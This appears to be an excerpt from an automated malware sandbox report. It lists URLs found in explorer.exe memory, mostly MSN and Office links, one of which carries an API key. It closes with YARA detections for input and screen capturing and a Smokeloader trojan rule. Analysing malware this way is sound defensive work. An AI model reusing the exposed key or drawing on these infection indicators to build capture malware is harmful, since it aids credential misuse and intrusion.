    Source: explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/BA
    Source: explorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
    Source: explorer.exe, 0000000A.00000003.2718077768.0000000008D93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905595416.0000000008020000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000001.00000000.1743944804.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2904513919.00000000054FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2706757154.0000000008D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000001.00000000.1743944804.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
    Source: explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
    Source: explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
    Source: explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bing.c
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
    Source: explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
    Source: explorer.exe, 0000000A.00000003.2703067682.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705262424.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2712298809.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711027366.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707506218.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905595416.0000000008020000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comi
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
    Source: explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBAJ56P.img
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
    Source: explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.comNES-PC
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.comCE
    Source: explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-ul
    Source: explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/home-and-garden/13-thx
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
